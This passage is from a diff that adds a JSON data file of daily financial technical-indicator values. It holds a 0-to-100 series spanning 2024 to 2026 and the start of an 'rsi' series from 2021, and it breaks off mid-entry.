"2024-06-25", + 31.12598536503779 + ], + [ + "2024-06-26", + 31.04320446032276 + ], + [ + "2024-06-27", + 27.38816672249436 + ], + [ + "2024-06-28", + 22.250675615079867 + ], + [ + "2024-07-01", + 21.987955949366064 + ], + [ + "2024-07-02", + 24.075746737412725 + ], + [ + "2024-07-03", + 24.90214587058923 + ], + [ + "2024-07-05", + 14.221800915211432 + ], + [ + "2024-07-08", + 13.585436307328024 + ], + [ + "2024-07-09", + 12.851637881188637 + ], + [ + "2024-07-10", + 15.06972344271771 + ], + [ + "2024-07-11", + 41.06055148359457 + ], + [ + "2024-07-12", + 36.935078803097724 + ], + [ + "2024-07-15", + 36.51448169907049 + ], + [ + "2024-07-16", + 36.25605713379721 + ], + [ + "2024-07-17", + 62.94646363917131 + ], + [ + "2024-07-18", + 63.56250603785091 + ], + [ + "2024-07-19", + 64.13853363361119 + ], + [ + "2024-07-22", + 70.52318125933667 + ], + [ + "2024-07-23", + 66.90838280737366 + ], + [ + "2024-07-24", + 97.3469201558357 + ], + [ + "2024-07-25", + 98.91968455604105 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 100.0 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 100.0 + ], + [ + "2024-08-06", + 100.0 + ], + [ + "2024-08-07", + 96.26794362825503 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.80897235202009 + ], + [ + "2024-08-12", + 99.77490923667276 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 93.07889273741615 + ], + [ + "2024-08-15", + 99.8890464357005 + ], + [ + "2024-08-16", + 99.1532991760643 + ], + [ + "2024-08-19", + 98.71279059350404 + ], + [ + "2024-08-20", + 98.62962661183401 + ], + [ + "2024-08-21", + 84.64454047420827 + ], + [ + "2024-08-22", + 86.289094418268 + ], + [ + "2024-08-23", + 86.45724151694762 + ], + [ + "2024-08-26", + 87.81864590105535 + ], + [ + "2024-08-27", + 85.34371222094858 + ], + [ + "2024-08-28", + 78.17552263664952 + ], + [ + "2024-08-29", + 71.05932434162851 + ], + [ + "2024-08-30", + 63.37808360572617 + ], + [ + "2024-09-03", + 64.53835104655278 + ], + [ + "2024-09-04", + 64.47977146670587 + ], + [ + "2024-09-05", + 62.17846699477345 + ], + [ + "2024-09-06", + 61.68210310485759 + ], + [ + "2024-09-09", + 63.41331459960915 + ], + [ + "2024-09-10", + 64.30487686330201 + ], + [ + "2024-09-11", + 62.56069149234693 + ], + [ + "2024-09-12", + 63.64614375086365 + ], + [ + "2024-09-13", + 55.59998382345033 + ], + [ + "2024-09-16", + 55.849060147651485 + ], + [ + "2024-09-17", + 53.22985465009543 + ], + [ + "2024-09-18", + 53.3801869350573 + ], + [ + "2024-09-19", + 62.21948944216567 + ], + [ + "2024-09-20", + 58.67570853905475 + ], + [ + "2024-09-23", + 57.34553252290118 + ], + [ + "2024-09-24", + 56.04325310595086 + ], + [ + "2024-09-25", + 55.995526561439846 + ], + [ + "2024-09-26", + 54.14962068362541 + ], + [ + "2024-09-27", + 54.78166694799751 + ], + [ + "2024-09-30", + 53.379095828341804 + ], + [ + "2024-10-01", + 41.25503907092099 + ], + [ + "2024-10-02", + 40.85440153573368 + ], + [ + "2024-10-03", + 40.980392329372066 + ], + [ + "2024-10-04", + 25.522784305380807 + ], + [ + "2024-10-07", + 28.166411150671404 + ], + [ + "2024-10-08", + 30.035150738995238 + ], + [ + "2024-10-09", + 23.72202496428751 + ], + [ + "2024-10-10", + 22.73322575642206 + ], + [ + "2024-10-11", + 22.624447740047422 + ], + [ + "2024-10-14", + 22.57243182273678 + ], + [ + "2024-10-15", + 27.446972122347685 + ], + [ + "2024-10-16", + 26.745657079056578 + ], + [ + "2024-10-17", + 14.038494015761705 + ], + [ + "2024-10-18", + 14.404710591764783 + ], + [ + "2024-10-21", + 14.373214036184729 + ], + [ + "2024-10-22", + 14.038389985997988 + ], + [ + "2024-10-23", + 20.063920398200704 + ], + [ + "2024-10-24", + 20.35165652090013 + ], + [ + "2024-10-25", + 20.08862255923142 + ], + [ + "2024-10-28", + 20.009479257030698 + ], + [ + "2024-10-29", + 16.02856608286724 + ], + [ + "2024-10-30", + 17.94479962926463 + ], + [ + "2024-10-31", + 32.1033942136204 + ], + [ + "2024-11-01", + 30.440004159944895 + ], + [ + "2024-11-04", + 28.24226451718826 + ], + [ + "2024-11-05", + 27.284171675339437 + ], + [ + "2024-11-06", + 39.17273306244145 + ], + [ + "2024-11-07", + 42.354533678244245 + ], + [ + "2024-11-08", + 42.35633302485019 + ], + [ + "2024-11-11", + 41.69161583432937 + ], + [ + "2024-11-12", + 38.028903317349126 + ], + [ + "2024-11-13", + 38.15770935440414 + ], + [ + "2024-11-14", + 39.50795550005767 + ], + [ + "2024-11-15", + 49.17129863695725 + ], + [ + "2024-11-18", + 49.770026777255524 + ], + [ + "2024-11-19", + 50.33979011761409 + ], + [ + "2024-11-20", + 46.19948463136561 + ], + [ + "2024-11-21", + 45.56465885874076 + ], + [ + "2024-11-22", + 45.23642934928584 + ], + [ + "2024-11-25", + 45.233411358967395 + ], + [ + "2024-11-26", + 44.41985553564106 + ], + [ + "2024-11-27", + 44.59712497426925 + ], + [ + "2024-11-29", + 32.827004426078084 + ], + [ + "2024-12-02", + 33.701089185610414 + ], + [ + "2024-12-03", + 33.05146292961065 + ], + [ + "2024-12-04", + 32.880070787576116 + ], + [ + "2024-12-05", + 20.865620808447392 + ], + [ + "2024-12-06", + 17.394648878929427 + ], + [ + "2024-12-09", + 19.14589308682635 + ], + [ + "2024-12-10", + 19.51952125994742 + ], + [ + "2024-12-11", + 25.455598871473406 + ], + [ + "2024-12-12", + 26.600487458046896 + ], + [ + "2024-12-13", + 25.69409887171305 + ], + [ + "2024-12-16", + 11.959058325729012 + ], + [ + "2024-12-17", + 13.385889633803455 + ], + [ + "2024-12-18", + 42.31143613961636 + ], + [ + "2024-12-19", + 42.82953170501135 + ], + [ + "2024-12-20", + 43.678689340483004 + ], + [ + "2024-12-23", + 44.66774265421449 + ], + [ + "2024-12-24", + 46.68967249687887 + ], + [ + "2024-12-26", + 46.66483740573024 + ], + [ + "2024-12-27", + 48.816081034703025 + ], + [ + "2024-12-30", + 51.172624226809496 + ], + [ + "2024-12-31", + 50.619088348028995 + ], + [ + "2025-01-02", + 50.47496753158398 + ], + [ + "2025-01-03", + 52.13392489877572 + ], + [ + "2025-01-06", + 53.95850848304213 + ], + [ + "2025-01-07", + 57.18445707776589 + ], + [ + "2025-01-08", + 56.53253551969589 + ], + [ + "2025-01-10", + 59.52597971930502 + ], + [ + "2025-01-13", + 54.14102773441349 + ], + [ + "2025-01-14", + 53.87879630798405 + ], + [ + "2025-01-15", + 60.983213935399284 + ], + [ + "2025-01-16", + 57.651271936814865 + ], + [ + "2025-01-17", + 62.129331763549544 + ], + [ + "2025-01-21", + 43.95847779606347 + ], + [ + "2025-01-22", + 45.61824497186116 + ], + [ + "2025-01-23", + 44.79827706338403 + ], + [ + "2025-01-24", + 44.43763910785857 + ], + [ + "2025-01-27", + 54.09566463129799 + ], + [ + "2025-01-28", + 57.72191493664614 + ], + [ + "2025-01-29", + 55.36364660063986 + ], + [ + "2025-01-30", + 52.92955178093928 + ], + [ + "2025-01-31", + 51.68836685742859 + ], + [ + "2025-02-03", + 52.72647617131302 + ], + [ + "2025-02-04", + 51.18053564025451 + ], + [ + "2025-02-05", + 49.5855025556515 + ], + [ + "2025-02-06", + 44.43064985044228 + ], + [ + "2025-02-07", + 47.379084691765485 + ], + [ + "2025-02-10", + 44.39239156366166 + ], + [ + "2025-02-11", + 44.216858699275704 + ], + [ + "2025-02-12", + 44.07495165618204 + ], + [ + "2025-02-13", + 39.47079651425187 + ], + [ + "2025-02-14", + 38.19707512616516 + ], + [ + "2025-02-18", + 34.438988256670505 + ], + [ + "2025-02-19", + 34.16442165549308 + ], + [ + "2025-02-20", + 31.901090255964142 + ], + [ + "2025-02-21", + 39.5149965695059 + ], + [ + "2025-02-24", + 41.16024468147446 + ], + [ + "2025-02-25", + 28.987096870312275 + ], + [ + "2025-02-26", + 24.37922440443064 + ], + [ + "2025-02-27", + 37.48775126215194 + ], + [ + "2025-02-28", + 41.84953802391085 + ], + [ + "2025-03-03", + 47.933039187859265 + ], + [ + "2025-03-04", + 47.464357323398325 + ], + [ + "2025-03-05", + 47.871854347282465 + ], + [ + "2025-03-06", + 55.98883974074072 + ], + [ + "2025-03-07", + 56.51931821463128 + ], + [ + "2025-03-10", + 70.12235694358287 + ], + [ + "2025-03-11", + 66.45959407104054 + ], + [ + "2025-03-12", + 69.91227189510961 + ], + [ + "2025-03-13", + 71.39659375470418 + ], + [ + "2025-03-14", + 77.04703799671016 + ], + [ + "2025-03-17", + 77.68244993436704 + ], + [ + "2025-03-18", + 78.31303655601292 + ], + [ + "2025-03-19", + 81.9986743877879 + ], + [ + "2025-03-20", + 82.0265376981951 + ], + [ + "2025-03-21", + 79.99633963372446 + ], + [ + "2025-03-24", + 86.07841396936816 + ], + [ + "2025-03-25", + 85.67311281202197 + ], + [ + "2025-03-26", + 88.23219598875212 + ], + [ + "2025-03-27", + 81.38586492747386 + ], + [ + "2025-03-28", + 83.93139511173912 + ], + [ + "2025-03-31", + 80.37864035779327 + ], + [ + "2025-04-01", + 81.5554715510053 + ], + [ + "2025-04-02", + 79.97218519736387 + ], + [ + "2025-04-03", + 100.0 + ], + [ + "2025-04-04", + 100.0 + ], + [ + "2025-04-07", + 93.87345470535809 + ], + [ + "2025-04-08", + 95.04745006897143 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 99.35323221505674 + ], + [ + "2025-04-14", + 99.37595220874506 + ], + [ + "2025-04-15", + 98.85956037837089 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 98.44854735864493 + ], + [ + "2025-04-29", + 98.51211222538431 + ], + [ + "2025-04-30", + 98.41494397292327 + ], + [ + "2025-05-01", + 98.5667477107579 + ], + [ + "2025-05-02", + 91.80285516500568 + ], + [ + "2025-05-05", + 81.21210056366091 + ], + [ + "2025-05-06", + 81.82109510365075 + ], + [ + "2025-05-07", + 80.07583393602751 + ], + [ + "2025-05-08", + 38.3238344652918 + ], + [ + "2025-05-09", + 28.579781203991388 + ], + [ + "2025-05-12", + 34.2425656291186 + ], + [ + "2025-05-13", + 34.67660113983193 + ], + [ + "2025-05-14", + 34.563666988643206 + ], + [ + "2025-05-15", + 27.54470013863935 + ], + [ + "2025-05-16", + 27.18237605756973 + ], + [ + "2025-05-19", + 20.89194858255486 + ], + [ + "2025-05-20", + 19.94778793633339 + ], + [ + "2025-05-21", + 21.295761761396705 + ], + [ + "2025-05-22", + 17.761491751189386 + ], + [ + "2025-05-23", + 18.78454262273118 + ], + [ + "2025-05-27", + 21.083557799911166 + ], + [ + "2025-05-28", + 21.57165888922821 + ], + [ + "2025-05-29", + 21.500620625697035 + ], + [ + "2025-05-30", + 21.361224869582195 + ], + [ + "2025-06-02", + 20.508931195185664 + ], + [ + "2025-06-03", + 20.02318986066853 + ], + [ + "2025-06-04", + 18.73421472038182 + ], + [ + "2025-06-05", + 19.74120069289507 + ], + [ + "2025-06-06", + 17.089258130592466 + ], + [ + "2025-06-09", + 16.97004239344638 + ], + [ + "2025-06-10", + 5.661362481484495 + ], + [ + "2025-06-11", + 4.132479092741989 + ], + [ + "2025-06-12", + 3.924800883767162 + ], + [ + "2025-06-13", + 5.821263097003383 + ], + [ + "2025-06-16", + 7.290033277150215 + ], + [ + "2025-06-17", + 8.348070165553905 + ], + [ + "2025-06-18", + 8.203346547398473 + ], + [ + "2025-06-20", + 6.419746515801106 + ], + [ + "2025-06-23", + 7.189546220307006 + ], + [ + "2025-06-24", + 7.445787914262114 + ], + [ + "2025-06-25", + 3.0068653859289736 + ], + [ + "2025-06-26", + 3.088866377922904 + ], + [ + "2025-06-27", + 3.085722802330825 + ], + [ + "2025-06-30", + 3.009713441474855 + ], + [ + "2025-07-01", + 4.055256627959344 + ], + [ + "2025-07-02", + 3.9322950944172286 + ], + [ + "2025-07-03", + 4.456779934907579 + ], + [ + "2025-07-07", + 4.386531137751305 + ], + [ + "2025-07-08", + 3.8584703611765137 + ], + [ + "2025-07-09", + 4.0953860129913755 + ], + [ + "2025-07-10", + 4.032781820092989 + ], + [ + "2025-07-11", + 3.3956825352838873 + ], + [ + "2025-07-14", + 1.9536556727898007 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.06942184329374562 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.1698823113925828 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 0.3845908275512061 + ], + [ + "2025-08-01", + 5.398080152558032 + ], + [ + "2025-08-04", + 8.493210224800741 + ], + [ + "2025-08-05", + 9.13586797780956 + ], + [ + "2025-08-06", + 10.170208730790966 + ], + [ + "2025-08-07", + 10.162931828673612 + ], + [ + "2025-08-08", + 10.587153471772721 + ], + [ + "2025-08-11", + 10.745091672024811 + ], + [ + "2025-08-12", + 11.838419312994237 + ], + [ + "2025-08-13", + 11.848776419408976 + ], + [ + "2025-08-14", + 11.563940434971846 + ], + [ + "2025-08-15", + 11.859188544031104 + ], + [ + "2025-08-18", + 11.738579120942404 + ], + [ + "2025-08-19", + 13.325402709375286 + ], + [ + "2025-08-20", + 13.548906061060478 + ], + [ + "2025-08-21", + 13.686188444851485 + ], + [ + "2025-08-22", + 15.556821886881606 + ], + [ + "2025-08-25", + 15.56418265136653 + ], + [ + "2025-08-26", + 15.648284659636854 + ], + [ + "2025-08-27", + 15.653849350082687 + ], + [ + "2025-08-28", + 15.581483889623815 + ], + [ + "2025-08-29", + 13.227024343389957 + ], + [ + "2025-09-02", + 11.130325506476938 + ], + [ + "2025-09-03", + 11.13903484261081 + ], + [ + "2025-09-04", + 10.45259178956217 + ], + [ + "2025-09-05", + 10.373920301633834 + ], + [ + "2025-09-08", + 9.810908356584012 + ], + [ + "2025-09-09", + 9.75210719880029 + ], + [ + "2025-09-10", + 8.191098776452352 + ], + [ + "2025-09-11", + 8.527500625923595 + ], + [ + "2025-09-12", + 8.67074508457734 + ], + [ + "2025-09-15", + 8.988897799490966 + ], + [ + "2025-09-16", + 9.00703361776457 + ], + [ + "2025-09-17", + 6.601217342389165 + ], + [ + "2025-09-18", + 6.386582410102664 + ], + [ + "2025-09-19", + 5.911396024082432 + ], + [ + "2025-09-22", + 4.048803762387119 + ], + [ + "2025-09-23", + 4.794966526929971 + ], + [ + "2025-09-24", + 5.184657334643114 + ], + [ + "2025-09-25", + 5.687090414444131 + ], + [ + "2025-09-26", + 5.505139967039011 + ], + [ + "2025-09-29", + 2.9103549500666035 + ], + [ + "2025-09-30", + 0.9380818932445516 + ], + [ + "2025-10-01", + 0.5798204088428086 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 0.8191728868774537 + ], + [ + "2025-10-06", + 1.167875245098653 + ], + [ + "2025-10-07", + 2.094193171615159 + ], + [ + "2025-10-08", + 3.284728085606504 + ], + [ + "2025-10-09", + 3.3252027636999575 + ], + [ + "2025-10-10", + 16.692274854683124 + ], + [ + "2025-10-13", + 19.438278402766553 + ], + [ + "2025-10-14", + 19.824000352383937 + ], + [ + "2025-10-15", + 20.025609330314122 + ], + [ + "2025-10-16", + 19.669867942910784 + ], + [ + "2025-10-17", + 19.646469307482654 + ], + [ + "2025-10-20", + 20.48327064335098 + ], + [ + "2025-10-21", + 20.087982547067895 + ], + [ + "2025-10-22", + 20.750774515018836 + ], + [ + "2025-10-23", + 20.914610357507083 + ], + [ + "2025-10-24", + 21.415773556721152 + ], + [ + "2025-10-27", + 23.025543640287214 + ], + [ + "2025-10-28", + 23.19945068859306 + ], + [ + "2025-10-29", + 23.188171823608037 + ], + [ + "2025-10-30", + 25.06707082038499 + ], + [ + "2025-10-31", + 24.8700386521057 + ], + [ + "2025-11-03", + 24.725286938798348 + ], + [ + "2025-11-04", + 27.336677399733105 + ], + [ + "2025-11-05", + 26.892393958483403 + ], + [ + "2025-11-06", + 28.986721028533196 + ], + [ + "2025-11-07", + 21.170354088997435 + ], + [ + "2025-11-10", + 21.357388888741006 + ], + [ + "2025-11-11", + 20.9948593944923 + ], + [ + "2025-11-12", + 20.848770938904217 + ], + [ + "2025-11-13", + 23.82168575413011 + ], + [ + "2025-11-14", + 23.602321227592864 + ], + [ + "2025-11-17", + 23.01094345583766 + ], + [ + "2025-11-18", + 23.797068749256177 + ], + [ + "2025-11-19", + 23.57309776334607 + ], + [ + "2025-11-20", + 26.136481846899212 + ], + [ + "2025-11-21", + 25.73485620228026 + ], + [ + "2025-11-24", + 27.84874036001228 + ], + [ + "2025-11-25", + 27.691819495249153 + ], + [ + "2025-11-26", + 28.12094926926277 + ], + [ + "2025-11-28", + 27.397287127789934 + ], + [ + "2025-12-01", + 27.245134350550455 + ], + [ + "2025-12-02", + 27.504292834939985 + ], + [ + "2025-12-03", + 25.126021319284053 + ], + [ + "2025-12-04", + 24.88098935072809 + ], + [ + "2025-12-05", + 22.60260816499212 + ], + [ + "2025-12-08", + 22.532421497446194 + ], + [ + "2025-12-09", + 19.399442791728383 + ], + [ + "2025-12-10", + 19.428157621377068 + ], + [ + "2025-12-11", + 19.5100021600735 + ], + [ + "2025-12-12", + 19.200249193627734 + ], + [ + "2025-12-15", + 19.400357475724057 + ], + [ + "2025-12-16", + 18.841963536890283 + ], + [ + "2025-12-17", + 20.350655001372154 + ], + [ + "2025-12-18", + 21.476585635049403 + ], + [ + "2025-12-19", + 17.746094385419827 + ], + [ + "2025-12-22", + 17.59196472653511 + ], + [ + "2025-12-23", + 13.091245302812831 + ], + [ + "2025-12-24", + 12.898512011055635 + ], + [ + "2025-12-26", + 12.356587109619728 + ], + [ + "2025-12-29", + 12.181264985489161 + ], + [ + "2025-12-30", + 12.149031244403483 + ], + [ + "2025-12-31", + 12.189743825013798 + ], + [ + "2026-01-02", + 12.119969776381033 + ], + [ + "2026-01-05", + 12.81081508684766 + ], + [ + "2026-01-06", + 13.402356151887595 + ], + [ + "2026-01-07", + 13.37914369355087 + ], + [ + "2026-01-08", + 13.647880845624108 + ], + [ + "2026-01-09", + 14.363898497049876 + ], + [ + "2026-01-12", + 14.283218240850912 + ], + [ + "2026-01-13", + 10.58732805876439 + ], + [ + "2026-01-14", + 11.53456341756636 + ], + [ + "2026-01-15", + 11.588382689313802 + ], + [ + "2026-01-16", + 7.52526400639489 + ], + [ + "2026-01-20", + 10.638381751574578 + ], + [ + "2026-01-21", + 10.673862771310596 + ], + [ + "2026-01-22", + 11.014976122374128 + ], + [ + "2026-01-23", + 10.885527914356915 + ], + [ + "2026-01-26", + 10.999364305986232 + ], + [ + "2026-01-27", + 11.71477208588749 + ], + [ + "2026-01-28", + 11.468080722832296 + ], + [ + "2026-01-29", + 11.807354046634764 + ], + [ + "2026-01-30", + 12.551515967409859 + ], + [ + "2026-02-02", + 12.802505026743349 + ], + [ + "2026-02-03", + 14.55371525219805 + ], + [ + "2026-02-04", + 16.087252425262303 + ], + [ + "2026-02-05", + 17.22315634969009 + ], + [ + "2026-02-06", + 20.7433484352128 + ], + [ + "2026-02-09", + 20.462245777469914 + ], + [ + "2026-02-10", + 20.517784889384505 + ], + [ + "2026-02-11", + 20.61297474802071 + ], + [ + "2026-02-12", + 22.490833378067517 + ], + [ + "2026-02-13", + 22.384448832370364 + ], + [ + "2026-02-17", + 22.389162448866962 + ], + [ + "2026-02-18", + 20.087237676024785 + ], + [ + "2026-02-19", + 18.764263621755063 + ], + [ + "2026-02-20", + 18.89750835474918 + ], + [ + "2026-02-23", + 19.58826660656518 + ], + [ + "2026-02-24", + 20.41659603897705 + ], + [ + "2026-02-25", + 21.33494325384257 + ], + [ + "2026-02-26", + 21.87763883097989 + ], + [ + "2026-02-27", + 21.784956046656703 + ], + [ + "2026-03-02", + 21.066557372139393 + ], + [ + "2026-03-03", + 21.148007723018093 + ], + [ + "2026-03-04", + 21.562548976379816 + ], + [ + "2026-03-05", + 19.50800314203519 + ], + [ + "2026-03-06", + 19.706414738600007 + ], + [ + "2026-03-09", + 17.784665300831332 + ], + [ + "2026-03-10", + 17.29035770017302 + ], + [ + "2026-03-11", + 17.158040501053357 + ], + [ + "2026-03-12", + 19.043115091012567 + ], + [ + "2026-03-13", + 16.396045151756322 + ], + [ + "2026-03-16", + 17.420212666071418 + ], + [ + "2026-03-17", + 17.607280254661408 + ], + [ + "2026-03-18", + 18.61157559967652 + ], + [ + "2026-03-19", + 18.582340308339525 + ], + [ + "2026-03-20", + 20.058891285445124 + ], + [ + "2026-03-23", + 20.539097941432246 + ], + [ + "2026-03-24", + 19.69271968953864 + ], + [ + "2026-03-25", + 18.309129261679015 + ], + [ + "2026-03-26", + 20.92044426635186 + ], + [ + "2026-03-27", + 22.739237876726456 + ], + [ + "2026-03-30", + 22.64322709799623 + ], + [ + "2026-03-31", + 30.252546707515666 + ], + [ + "2026-04-01", + 29.80789904798464 + ], + [ + "2026-04-02", + 29.847831656307065 + ], + [ + "2026-04-06", + 29.117298681369242 + ], + [ + "2026-04-07", + 27.98574796288593 + ], + [ + "2026-04-08", + 32.83134955644584 + ], + [ + "2026-04-09", + 33.05449216044124 + ], + [ + "2026-04-10", + 31.426697975187267 + ], + [ + "2026-04-13", + 31.476381311833833 + ], + [ + "2026-04-14", + 32.38748836750661 + ], + [ + "2026-04-15", + 33.03069065728456 + ], + [ + "2026-04-16", + 31.44720527221653 + ], + [ + "2026-04-17", + 31.576710225570153 + ], + [ + "2026-04-20", + 28.782664153972863 + ], + [ + "2026-04-21", + 28.976752998950616 + ], + [ + "2026-04-22", + 28.838529057833867 + ], + [ + "2026-04-23", + 29.495708464993054 + ] + ], + "rsi": [ + [ + "2021-04-01", + 50.0 + ], + [ + "2021-04-05", + 50.0 + ], + [ + "2021-04-06", + 99.72777901255112 + ], + [ + "2021-04-07", + 99.7305275495297 + ], + [ + "2021-04-08", + 99.74263052151944 + ], + [ + "2021-04-09", + 99.74973265449688 + ], + [ + "2021-04-12", + 99.11139853730353 + ], + [ + "2021-04-13", + 99.16292904012131 + ], + [ + "2021-04-14", + 93.11125152282622 + ], + [ + "2021-04-15", + 93.63303359436226 + ], + [ + "2021-04-16", + 93.67351684548501 + ], + [ + "2021-04-19", + 88.91043980928049 + ], + [ + "2021-04-20", + 85.22757417189759 + ], + [ + "2021-04-21", + 85.95795603288563 + ], + [ + "2021-04-22", + 79.9152080216298 + ], + [ + "2021-04-23", + 81.37040821632328 + ], + [ + "2021-04-26", + 82.10176251884505 + ], + [ + "2021-04-27", + 79.841301256602 + ], + [ + "2021-04-28", + 78.04319138415893 + ], + [ + "2021-04-29", + 78.59396385955482 + ], + [ + "2021-04-30", + 74.89567636170723 + ], + [ + "2021-05-03", + 71.95274053598013 + ], + [ + "2021-05-04", + 62.992945732148456 + ], + [ + "2021-05-05", + 61.48015663825001 + ], + [ + "2021-05-06", + 63.584197258570065 + ], + [ + "2021-05-07", + 65.768352727742 + ], + [ + "2021-05-10", + 54.68575541856089 + ], + [ + "2021-05-11", + 54.161729413584425 + ], + [ + "2021-05-12", + 45.39591677141548 + ], + [ + "2021-05-13", + 48.03138797395552 + ], + [ + "2021-05-14", + 54.793347356128244 + ], + [ + "2021-05-17", + 52.71869266961082 + ], + [ + "2021-05-18", + 50.443616042244344 + ], + [ + "2021-05-19", + 50.82957617272382 + ], + [ + "2021-05-20", + 56.924612557081105 + ], + [ + "2021-05-21", + 54.791314738229154 + ], + [ + "2021-05-24", + 59.70584454421322 + ], + [ + "2021-05-25", + 60.09647365462783 + ], + [ + "2021-05-26", + 61.12025703802259 + ], + [ + "2021-05-27", + 59.3531328327564 + ], + [ + "2021-05-28", + 60.38912424429294 + ], + [ + "2021-06-01", + 58.68614621320755 + ], + [ + "2021-06-02", + 59.408027086765074 + ], + [ + "2021-06-03", + 53.9852010514837 + ], + [ + "2021-06-04", + 60.285679395340665 + ], + [ + "2021-06-07", + 61.3046199293574 + ], + [ + "2021-06-08", + 61.474900373046154 + ], + [ + "2021-06-09", + 61.56595270698775 + ], + [ + "2021-06-10", + 65.42818316294395 + ], + [ + "2021-06-11", + 66.35148579852415 + ], + [ + "2021-06-14", + 69.56735558362946 + ], + [ + "2021-06-15", + 64.96656516010103 + ], + [ + "2021-06-16", + 62.49367104600236 + ], + [ + "2021-06-17", + 67.15711597089928 + ], + [ + "2021-06-18", + 61.96419491543628 + ], + [ + "2021-06-21", + 64.30017433780066 + ], + [ + "2021-06-22", + 67.54016430856862 + ], + [ + "2021-06-23", + 67.7073130365776 + ], + [ + "2021-06-24", + 69.82374090802259 + ], + [ + "2021-06-25", + 68.85178137411152 + ], + [ + "2021-06-28", + 72.87120866951454 + ], + [ + "2021-06-29", + 73.96109177116739 + ], + [ + "2021-06-30", + 72.58706309101024 + ], + [ + "2021-07-01", + 72.72347662928014 + ], + [ + "2021-07-02", + 76.40029185991497 + ], + [ + "2021-07-06", + 77.63653015890817 + ], + [ + "2021-07-07", + 78.23857696986397 + ], + [ + "2021-07-08", + 72.23229214289918 + ], + [ + "2021-07-09", + 74.40644807766805 + ], + [ + "2021-07-12", + 75.69638300602185 + ], + [ + "2021-07-13", + 75.69638300602186 + ], + [ + "2021-07-14", + 76.33412263643355 + ], + [ + "2021-07-15", + 68.71619360337529 + ], + [ + "2021-07-16", + 61.18631144421222 + ], + [ + "2021-07-19", + 54.70812603359066 + ], + [ + "2021-07-20", + 60.966382503809854 + ], + [ + "2021-07-21", + 64.51639942927717 + ], + [ + "2021-07-22", + 67.28128788041187 + ], + [ + "2021-07-23", + 71.52975024964621 + ], + [ + "2021-07-26", + 71.79882480124832 + ], + [ + "2021-07-27", + 62.84350053268119 + ], + [ + "2021-07-28", + 64.48833198435833 + ], + [ + "2021-07-29", + 65.25736866290757 + ], + [ + "2021-07-30", + 61.07238567553689 + ], + [ + "2021-08-02", + 61.11469598994497 + ], + [ + "2021-08-03", + 64.19269233837517 + ], + [ + "2021-08-04", + 64.91012048682103 + ], + [ + "2021-08-05", + 67.95012892823647 + ], + [ + "2021-08-06", + 63.81052051086799 + ], + [ + "2021-08-09", + 64.7805169877682 + ], + [ + "2021-08-10", + 59.97010689840783 + ], + [ + "2021-08-11", + 58.41297681429681 + ], + [ + "2021-08-12", + 60.71456390527855 + ], + [ + "2021-08-13", + 62.876811663617644 + ], + [ + "2021-08-16", + 63.14786679528263 + ], + [ + "2021-08-17", + 54.454309094592986 + ], + [ + "2021-08-18", + 46.92001763805888 + ], + [ + "2021-08-19", + 50.58079398012657 + ], + [ + "2021-08-20", + 57.39750403664496 + ], + [ + "2021-08-23", + 64.98574560714843 + ], + [ + "2021-08-24", + 66.32454957300935 + ], + [ + "2021-08-25", + 66.83971066739997 + ], + [ + "2021-08-26", + 61.25516981685048 + ], + [ + "2021-08-27", + 65.91926668499167 + ], + [ + "2021-08-30", + 70.3936483408786 + ], + [ + "2021-08-31", + 69.67011842138047 + ], + [ + "2021-09-01", + 70.33749958884928 + ], + [ + "2021-09-02", + 69.86430737626199 + ], + [ + "2021-09-03", + 71.21920292630585 + ], + [ + "2021-09-07", + 71.84811871180308 + ], + [ + "2021-09-08", + 67.91106635011081 + ], + [ + "2021-09-09", + 64.18086956307411 + ], + [ + "2021-09-10", + 56.79455529218046 + ], + [ + "2021-09-13", + 56.16599676557467 + ], + [ + "2021-09-14", + 53.540648971566185 + ], + [ + "2021-09-15", + 58.93163958876515 + ], + [ + "2021-09-16", + 59.40419877101468 + ], + [ + "2021-09-17", + 48.94862099510424 + ], + [ + "2021-09-20", + 36.891483485279124 + ], + [ + "2021-09-21", + 37.85299950176007 + ], + [ + "2021-09-22", + 44.743109797440546 + ], + [ + "2021-09-23", + 50.62137061404416 + ], + [ + "2021-09-24", + 51.195317180325496 + ], + [ + "2021-09-27", + 46.26499804287106 + ], + [ + "2021-09-28", + 33.90037513247897 + ], + [ + "2021-09-29", + 33.35983691769624 + ], + [ + "2021-09-30", + 32.125678697936536 + ], + [ + "2021-10-01", + 36.38812214005615 + ], + [ + "2021-10-04", + 29.576418761454065 + ], + [ + "2021-10-05", + 37.50863465900561 + ], + [ + "2021-10-06", + 40.954112397853315 + ], + [ + "2021-10-07", + 45.608337073117184 + ], + [ + "2021-10-08", + 43.57932703374307 + ], + [ + "2021-10-11", + 40.602353470927106 + ], + [ + "2021-10-12", + 39.2978144258677 + ], + [ + "2021-10-13", + 43.75090805848233 + ], + [ + "2021-10-14", + 52.45833993120707 + ], + [ + "2021-10-15", + 55.068129114235106 + ], + [ + "2021-10-18", + 58.96430081844929 + ], + [ + "2021-10-19", + 61.68404699383822 + ], + [ + "2021-10-20", + 60.928493734927756 + ], + [ + "2021-10-21", + 63.19752070239752 + ], + [ + "2021-10-22", + 58.16201047485348 + ], + [ + "2021-10-25", + 62.092073803374525 + ], + [ + "2021-10-26", + 63.24717696731051 + ], + [ + "2021-10-27", + 